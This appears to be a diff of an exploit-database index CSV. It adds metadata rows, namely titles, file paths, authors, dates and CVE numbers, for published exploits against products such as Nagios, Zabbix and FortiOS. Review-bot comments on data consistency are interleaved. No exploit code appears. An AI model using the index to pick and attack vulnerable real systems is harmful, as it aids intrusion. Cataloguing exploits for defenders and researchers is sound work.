52177,exploits/multiple/webapps/52177.md,"Nagios Log Server 2024R1.3.1 - API Key Exposure",2025-04-11,"Seth Kraft",webapps,multiple,,2025-04-11,2025-04-11,0,,,,,,
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-03,0,,,,,,
52117,exploits/multiple/webapps/52117.md,"Nagios Log Server 2024R1.3.1 - Stored XSS",2025-04-03,"Seth Kraft",webapps,multiple,,2025-04-03,2025-04-16,0,CVE-2025-29471,,,,,
52138,exploits/multiple/webapps/52138.txt,"Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)",2025-04-08,"Calil Khalil",webapps,multiple,,2025-04-08,2025-04-08,0,CVE-2019-15949,,,,,
51925,exploits/multiple/webapps/51925.py,"Nagios XI Version 2024R1.01 - SQL Injection",2024-03-25,"Jarod Jaslow (MAWK)",webapps,multiple,,2024-03-25,2024-03-25,0,,,,,,
41554,exploits/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",webapps,multiple,80,2017-03-08,2018-11-20,0,,"SQL Injection (SQLi)",,,,
@ -12280,6 +12287,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45969,exploits/multiple/webapps/45969.txt,"PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion",2018-12-11,bzyo,webapps,multiple,,2018-12-11,2018-12-11,0,,,,,,
44276,exploits/multiple/webapps/44276.txt,"Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials",2018-03-12,LiquidWorm,webapps,multiple,,2018-03-12,2018-03-12,0,,,,,,
50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple,,2021-08-26,2021-08-26,0,,,,,,
52236,exploits/multiple/webapps/52236.txt,"ProConf 6.0 - Insecure Direct Object Reference (IDOR)",2025-04-16,ub3rsick,webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2018-16606,,,,,
9728,exploits/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,cr4wl3r,webapps,multiple,,2009-09-20,,1,OSVDB-58298;CVE-2009-3324,,,,,
52103,exploits/multiple/webapps/52103.py,"Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass",2025-03-28,VeryLazyTech,webapps,multiple,,2025-03-28,2025-04-13,0,CVE-2024-4358,,,,,
35219,exploits/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",webapps,multiple,,2014-11-17,2014-11-17,0,OSVDB-114840;CVE-2014-9237,,,,,
@ -12397,6 +12405,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47308,exploits/multiple/webapps/47308.py,"Tableau - XML External Entity",2019-08-27,"Jarad Kopf",webapps,multiple,,2019-08-27,2019-08-27,1,CVE-2019-15637,,,,,
49828,exploits/multiple/webapps/49828.js,"Tagstoo 2.0.1 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
48805,exploits/multiple/webapps/48805.txt,"Tea LaTex 1.0 - Remote Code Execution (Unauthenticated)",2020-09-11,nepska,webapps,multiple,,2020-09-11,2020-09-11,0,,,,,,
52228,exploits/multiple/webapps/52228.txt,"Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)",2025-04-16,"Ayato Shitomi @ Fore-Z co.ltd",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-46278,,,,,
49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,,2020-12-01,2020-12-01,0,,,,,,
49194,exploits/multiple/webapps/49194.txt,"Testa Online Test Management System 3.4.7 - 'q' SQL Injection",2020-12-04,"Ultra Security Team",webapps,multiple,,2020-12-04,2020-12-04,0,,,,,,
49077,exploits/multiple/webapps/49077.txt,"TestBox CFML Test Framework 4.1.0 - Arbitrary File Write and Remote Code Execution",2020-11-19,"Darren King",webapps,multiple,,2020-11-19,2020-11-19,0,,,,,,
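Review bot: the author column of the 52228 Teedy row embeds an affiliation ("Ayato Shitomi @ Fore-Z co.ltd"), whereas the surrounding rows carry only a name; keep the author field to the name for consistency with the rest of the file.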
@ -12463,6 +12472,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43441,exploits/multiple/webapps/43441.txt,"WinMX < 2.6 - Design Error",2003-06-02,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00006,,,,,http://gulftech.org/advisories/WinMX%20Design%20Error/6
47342,exploits/multiple/webapps/47342.html,"Wolters Kluwer TeamMate 3.1 - Cross-Site Request Forgery",2019-09-02,"Bhadresh Patel",webapps,multiple,,2019-09-02,2020-06-18,0,,,,,,
51805,exploits/multiple/webapps/51805.py,"Wondercms 4.3.2 - XSS to RCE",2024-02-19,"Anas Zakir",webapps,multiple,,2024-02-19,2024-02-19,0,,,,,,
52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,,
47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,,
48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,,
@ -13045,6 +13055,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44336,exploits/php/dos/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,dos,php,,2018-03-23,2018-03-23,0,,"Denial of Service (DoS)",,,,
52218,exploits/php/hardware/52218.txt,"ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) - Denial of Service (DOS)",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,CVE-2024-48844,,,,,
52219,exploits/php/hardware/52219.txt,"ABB Cylon Aspect 3.08.02 (webServerUpdate.php) - Input Validation Config Poisoning",2025-04-15,LiquidWorm,hardware,php,,2025-04-15,2025-04-15,0,,,,,,
52234,exploits/php/hardware/52234.txt,"ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) - File Write DoS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
52233,exploits/php/hardware/52233.txt,"ABB Cylon Aspect 4.00.00 (factorySaved.php) - Unauthenticated XSS",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
52232,exploits/php/hardware/52232.txt,"ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) - Remote Code Execution",2025-04-16,LiquidWorm,hardware,php,,2025-04-16,2025-04-16,0,,,,,,
13768,exploits/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,local,php,,2010-06-07,2017-07-19,1,,,,http://www.exploit-db.com/screenshots/idlt14000/screen-shot-2011-01-07-at-113530-pm.png,http://www.exploit-db.comCastRipper.exe,
28504,exploits/php/local/28504.php,"PHP 3 < 5 - Ini_Restore() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",local,php,,2006-09-09,2016-12-02,1,CVE-2006-4625;OSVDB-29603,,,,http://www.exploit-db.comphp-4.4.4.tar.gz,https://www.securityfocus.com/bid/19933/info
21347,exploits/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File open_basedir Circumvention",2002-03-17,Tozz,local,php,,2002-03-17,2016-12-02,1,CVE-2002-0484;OSVDB-5282,,,,http://www.exploit-db.comphp-4.1.2.tar.gz,https://www.securityfocus.com/bid/4325/info
@ -15597,6 +15610,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49055,exploits/php/webapps/49055.txt,"Car Rental Management System 1.0 - Remote Code Execution (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php,,2020-11-16,2020-11-16,0,,,,,,
49025,exploits/php/webapps/49025.py,"Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload",2020-11-10,"Fortunato Lodari",webapps,php,,2020-11-10,2020-11-10,0,,,,,,
49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,,2020-12-02,2020-12-02,0,,,,,,
52243,exploits/php/webapps/52243.py,"Car Rental Project 1.0 - Remote Code Execution",2025-04-16,ub3rsick,webapps,php,,2025-04-16,2025-04-16,0,CVE-2020-5509,,,,,
49520,exploits/php/webapps/49520.py,"Car Rental Project 2.0 - Arbitrary File Upload to Remote Code Execution",2021-02-03,"Jannick Tiger",webapps,php,,2021-02-03,2021-02-03,0,,,,,,
51567,exploits/php/webapps/51567.txt,"Car Rental Script 1.8 - Stored Cross-site scripting (XSS)",2023-07-04,CraCkEr,webapps,php,,2023-07-04,2023-07-04,0,,,,,,
43308,exploits/php/webapps/43308.txt,"Car Rental Script 2.0.4 - 'val' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17637,,,,,
@ -22533,6 +22547,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
29294,exploits/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,webapps,php,,2006-12-18,2013-10-30,1,CVE-2006-6721;OSVDB-31516,,,,,https://www.securityfocus.com/bid/21637/info
23384,exploits/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",webapps,php,,2003-11-17,2012-12-14,1,,,,,,https://www.securityfocus.com/bid/9054/info
51388,exploits/php/webapps/51388.py,"KodExplorer 4.49 - CSRF to Arbitrary File Upload",2023-04-25,"Mr Empy",webapps,php,,2023-04-25,2023-04-25,0,CVE-2022-4944,,,,,
52245,exploits/php/webapps/52245.txt,"KodExplorer 4.52 - Open Redirect",2025-04-16,"Rahad Chowdhury",webapps,php,,2025-04-16,2025-04-16,0,,,,,,
51419,exploits/php/webapps/51419.txt,"KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)",2023-05-05,nu11secur1ty,webapps,php,,2023-05-05,2023-05-05,0,,,,,,
37388,exploits/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4632;OSVDB-123654;OSVDB-123653,,,,http://www.exploit-db.comKoha-3.20.00.zip,
37389,exploits/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2016-08-31,0,CVE-2015-4631;CVE-2015-4630,,,,http://www.exploit-db.comKoha-3.20.00.zip,
@ -24531,6 +24546,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49422,exploits/php/webapps/49422.py,"Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated)",2021-01-14,"Haboob Team",webapps,php,,2021-01-14,2021-01-18,0,CVE-2020-35578,,,,,
3919,exploits/php/webapps/3919.txt,"NagiosQL 2005 2.00 - 'prepend_adm.php' Remote File Inclusion",2007-05-14,"ThE TiGeR",webapps,php,,2007-05-13,2016-10-05,1,OSVDB-36054;CVE-2007-2710;CVE-2007-2709,,,,http://www.exploit-db.comnagiosql-2.00-P00.tar.gz,
24415,exploits/php/webapps/24415.txt,"Nagl XOOPS Dictionary Module 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-08-28,CyruxNET,webapps,php,,2004-08-28,2013-01-27,1,CVE-2004-1640;OSVDB-9394,,,,,https://www.securityfocus.com/bid/11064/info
52229,exploits/php/webapps/52229.py,"NagVis 1.9.33 - Arbitrary File Read",2025-04-16,xerosec,webapps,php,,2025-04-16,2025-04-16,0,CVE-2022-46945,,,,,
37270,exploits/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,webapps,php,80,2015-06-12,2015-06-12,0,OSVDB-123303;OSVDB-123302;OSVDB-123301;OSVDB-123300;OSVDB-123299;OSVDB-123298;OSVDB-123297,,,,http://www.exploit-db.comkilrizzy-Nakid-CMS-f274624.tar.gz,
13893,exploits/php/webapps/13893.txt,"Nakid CMS 0.5.2 - 'FCKeditor' Arbitrary File Upload",2010-06-16,eidelweiss,webapps,php,,2010-06-15,2010-08-31,0,,,,,http://www.exploit-db.comNakidCMSv_0_5_2.rar,
13889,exploits/php/webapps/13889.txt,"Nakid CMS 0.5.2 - Remote File Inclusion",2010-06-16,sh00t0ut,webapps,php,,2010-06-15,,0,CVE-2010-2358;OSVDB-65543,,,,http://www.exploit-db.comNakidCMSv_0_5_2.rar,
@ -27624,6 +27640,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42761,exploits/php/webapps/42761.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (1)",2017-09-21,"Ishaq Mohammed",webapps,php,,2017-09-21,2017-11-17,0,CVE-2017-14618,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
42987,exploits/php/webapps/42987.txt,"phpMyFAQ 2.9.8 - Cross-Site Scripting (2)",2017-10-13,"Ishaq Mohammed",webapps,php,,2017-10-13,2017-11-17,0,CVE-2017-14619,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
43063,exploits/php/webapps/43063.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting (3)",2017-10-28,"Nikhil Mittal",webapps,php,,2017-10-30,2017-10-30,0,CVE-2017-15727,,,,http://www.exploit-db.comphpmyfaq-2.9.8.zip,
52226,exploits/php/webapps/52226.txt,"phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)",2025-04-16,CodeSecLab,webapps,php,,2025-04-16,2025-04-16,0,CVE-2022-4407,,,,,
52235,exploits/php/webapps/52235.txt,"phpMyFAQ 3.2.10 - Unintended File Download Triggered by Embedded Frames",2025-04-16,Geo,webapps,php,,2025-04-16,2025-04-16,0,CVE-2024-55889,,,,,
33385,exploits/php/webapps/33385.txt,"phpMyFAQ < 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2009-12-01,"Amol Naik",webapps,php,,2009-12-01,2016-09-27,1,CVE-2009-4780;OSVDB-60586,,,,http://www.exploit-db.comphpmyfaq-2.5.3.zip,https://www.securityfocus.com/bid/37180/info
51399,exploits/php/webapps/51399.txt,"phpMyFAQ v3.1.12 - CSV Injection",2023-05-02,"Mirabbas Ağalarov",webapps,php,,2023-05-02,2023-05-02,0,,,,,,
27586,exploits/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php?type' CRLF Injection",2006-04-10,Psych0,webapps,php,,2006-04-10,2013-08-14,1,CVE-2006-1714;OSVDB-24705,,,,,https://www.securityfocus.com/bid/17420/info
@ -30129,6 +30147,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40904,exploits/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",webapps,php,,2016-12-12,2016-12-12,0,,,,,,
49290,exploits/php/webapps/49290.txt,"Smart Hospital 3.1 - _Add Patient_ Stored XSS",2020-12-18,"Kislay Kumar",webapps,php,,2020-12-18,2020-12-18,0,,,,,,
34689,exploits/php/webapps/34689.txt,"Smart Magician Blog 1.0 - Multiple SQL Injections",2009-08-27,Evil-Cod3r,webapps,php,,2009-08-27,2014-09-18,1,,,,,,https://www.securityfocus.com/bid/43376/info
52247,exploits/php/webapps/52247.txt,"Smart Manager 8.27.0 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,php,,2025-04-16,2025-04-16,0,CVE-2024-0566,,,,,
36386,exploits/php/webapps/36386.txt,"Smart PHP Poll - Authentication Bypass",2015-03-16,"Mr.tro0oqy yemen",webapps,php,,2015-03-16,2015-03-16,1,OSVDB-119631,,,,http://www.exploit-db.comsmart_php_poll.zip,
10437,exploits/php/webapps/10437.txt,"Smart PHP Subscriber - Multiple Disclosure Vulnerabilities",2009-12-14,"Milos Zivanovic",webapps,php,,2009-12-13,,1,CVE-2007-0518;OSVDB-32946,,,,,
10727,exploits/php/webapps/10727.txt,"Smart PHP Uploader 1.0 - Arbitrary File Upload",2009-12-27,Phenom,webapps,php,,2009-12-26,,1,,,,,http://www.exploit-db.comphpuploader.zip,
@ -34884,6 +34903,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47474,exploits/php/webapps/47474.pl,"Zabbix 4.4 - Authentication Bypass",2019-10-08,"Todor Donev",webapps,php,,2019-10-08,2019-10-10,0,,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
49202,exploits/php/webapps/49202.txt,"Zabbix 5.0.0 - Stored XSS via URL Widget Iframe",2020-12-04,"Shwetabh Vishnoi",webapps,php,,2020-12-04,2020-12-04,0,,,,,,
50816,exploits/php/webapps/50816.py,"Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)",2022-03-10,"Hussien Misbah",webapps,php,,2022-03-10,2022-03-10,0,,,,,,
52230,exploits/php/webapps/52230.py,"Zabbix 7.0.0 - SQL Injection",2025-04-16,m4nb4,webapps,php,,2025-04-16,2025-04-16,0,CVE-2024-42327,,,,,
33288,exploits/php/webapps/33288.txt,"Zainu 1.0 - 'searchSongKeyword' Cross-Site Scripting",2009-10-14,"drunken danish rednecks",webapps,php,,2009-10-14,2014-05-10,1,CVE-2009-4523;OSVDB-61466,,,,,https://www.securityfocus.com/bid/36701/info
26604,exploits/php/webapps/26604.txt,"Zainu 2.0 - SQL Injection",2005-11-28,r0t,webapps,php,,2005-11-28,2013-07-05,1,CVE-2005-3884;OSVDB-21197,,,,,https://www.securityfocus.com/bid/15579/info
24235,exploits/php/webapps/24235.txt,"ZaireWeb Solutions NewsLetter ZWS - Administrative Interface Authentication Bypass",2004-06-24,GaMeS,webapps,php,,2004-06-24,2013-01-20,1,CVE-2004-0621;OSVDB-16040,,,,,https://www.securityfocus.com/bid/10605/info
@ -35098,6 +35118,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
42650,exploits/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,remote,python,2375,2017-09-11,2017-09-11,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/c91ef1f09274d7f0efaf89c3740ceca316cca0b3/modules/exploits/linux/http/docker_daemon_tcp.rb
50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",2022-01-05,"Jeremiasz Pluta",remote,python,,2022-01-05,2022-01-05,0,CVE-2021-43857,,,,,
42599,exploits/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,remote,python,,2017-08-31,2017-09-01,1,CVE-2017-1000117,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/202c936868328a4fe665c9d2ea82b8f8a2610b6e/modules/exploits/multi/http/git_submodule_command_exec.rb
52227,exploits/python/remote/52227.txt,"Hugging Face Transformers MobileViTV2 4.41.1 - Remote Code Execution (RCE)",2025-04-16,"The Kernel Panic",remote,python,,2025-04-16,2025-04-16,0,CVE-2024-11392,,,,,https://drive.google.com/file/d/14bnNaCRmFOQvPHUR9zQwdbjMmzKE2pZl/view?usp=drive_link
41720,exploits/python/remote/41720.rb,"Logsign 4.4.2/4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,"Mehmet Ince",remote,python,,2017-03-24,2017-04-04,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/a93aef8b7adecc4059c6cf168dd181e169cbc0b2/modules/exploits/linux/http/logsign_exec.rb
46075,exploits/python/remote/46075.rb,"Mailcleaner - (Authenticated) Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443,2019-01-07,2019-03-17,0,,"Metasploit Framework (MSF)",,,,
41942,exploits/python/remote/41942.rb,"Mercurial - Custom hg-ssh Wrapper Remote Code Exec (Metasploit)",2017-04-27,Metasploit,remote,python,22,2017-04-27,2017-04-27,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/bbee7f86b5c1bd8b2e245b98fce1cb858b327948/modules/exploits/linux/ssh/mercurial_ssh_exec.rb
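Review bot: the source_url of the 52227 Hugging Face Transformers row points at a Google Drive share link rather than an advisory or repository URL; such links can be revoked or changed by their owner at any time, so prefer the vendor advisory or the CVE reference as the source URL, or leave the column empty as the neighbouring rows do.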
@ -43283,6 +43304,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35509,exploits/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow",2011-03-27,KedAns-Dz,remote,windows,,2011-03-27,2014-12-09,1,,,,,,https://www.securityfocus.com/bid/47045/info
3063,exploits/windows/remote/3063.pl,"Formbankserver 1.9 - 'Name' Directory Traversal",2007-01-01,Bl0od3r,remote,windows,,2006-12-31,,1,OSVDB-32545;CVE-2007-0055,,,,,
19942,exploits/windows/remote/19942.txt,"Fortech Proxy+ 2.30 - Remote Administration",1999-12-26,anonymous,remote,windows,,1999-12-26,2012-07-19,1,OSVDB-84754,,,,,https://www.securityfocus.com/bid/1226/info
52239,exploits/windows/remote/52239.py,"Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass",2025-04-16,ub3rsick,remote,windows,,2025-04-16,2025-04-16,0,CVE-2022-40684,,,,,
44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows,,2018-06-25,2018-06-25,1,CVE-2018-9958;CVE-2018-9948,"Use After Free (UAF)",,http://www.exploit-db.com/screenshots/idlt45000/poc.png,http://www.exploit-db.comFoxitReader901_enu_Setup_Prom.exe,
24502,exploits/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit)",2013-02-14,Metasploit,remote,windows,,2013-02-14,2013-02-14,1,OSVDB-89030,"Metasploit Framework (MSF)",,,http://www.exploit-db.comFoxitReader544.1128_enu_Setup.exe,http://secunia.com/advisories/51733/
854,exploits/windows/remote/854.cpp,"Foxmail 1.1.0.1 - POP3 Temp Dir Stack Overflow",2005-03-02,Swan,remote,windows,110,2005-03-01,,1,OSVDB-14370;CVE-2005-0635,,,,,
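Review bot: the added row 52239 files the Fortinet FortiOS / FortiProxy / FortiSwitchManager authentication bypass (CVE-2022-40684) under `platform=windows` with path `exploits/windows/remote/52239.py`; FortiOS is Fortinet's appliance operating system, not Windows software, so the platform value (and therefore the directory) does not match the target named in the description itself and should be corrected before the index is regenerated. A second, minor point on the same line: the product list is written with underscores ("FortiOS_ FortiProxy_ and FortiSwitchManager") where the other titles in this file keep ordinary punctuation inside the quoted field; if the underscores are the repository's deliberate comma substitution, fine, otherwise restore the commas so the title reads naturally in search output.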
@ -45834,6 +45856,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35434,exploits/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",remote,windows,,2011-03-09,2014-12-03,1,CVE-2011-0167;OSVDB-73773,,,,,https://www.securityfocus.com/bid/46816/info
20125,exploits/windows/remote/20125.txt,"Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution",2000-08-01,"Foundstone Inc.",remote,windows,,2000-08-01,2012-07-31,1,CVE-2000-0685;OSVDB-59351,,,,,https://www.securityfocus.com/bid/1525/info
29843,exploits/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console - Directory Traversal",2007-04-11,"Patrick Webster",remote,windows,,2007-04-11,2013-11-27,1,CVE-2007-2048;OSVDB-34992,,,,,https://www.securityfocus.com/bid/23423/info
52237,exploits/windows/remote/52237.txt,"WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page",2025-04-16,"Rasime Ekici",remote,windows,,2025-04-16,2025-04-16,0,CVE-2024-23733,,,,,
3395,exploits/windows/remote/3395.c,"WebMod 0.48 - Content-Length Remote Buffer Overflow",2007-03-01,cybermind,remote,windows,,2007-02-28,,1,OSVDB-33834;CVE-2007-1260,,,,,
23411,exploits/windows/remote/23411.txt,"Websense Enterprise 4/5 - Blocked Sites Cross-Site Scripting",2003-12-03,"Mr. P.Taylor",remote,windows,,2003-12-03,2012-12-16,1,OSVDB-2901,,,,,https://www.securityfocus.com/bid/9149/info
16802,exploits/windows/remote/16802.rb,"Webster HTTP Server - GET Buffer Overflow (Metasploit)",2010-11-03,Metasploit,remote,windows,,2010-11-03,2011-03-07,1,CVE-2002-2268;OSVDB-44106,"Metasploit Framework (MSF)",,,,
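Review bot: the added row 52237 spells the product "WebMethods" while the existing entry 29843 two lines above uses "webMethods"; pick one spelling so the two entries sort together and match the same search. The title "Improper Access on Login Page" also describes a weakness category rather than an outcome, which is less useful than the other titles in this hunk ("Remote Command Execution", "Cross-Site Scripting"); state the effect the write-up documents for CVE-2024-23733 so readers can judge impact from the index alone.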
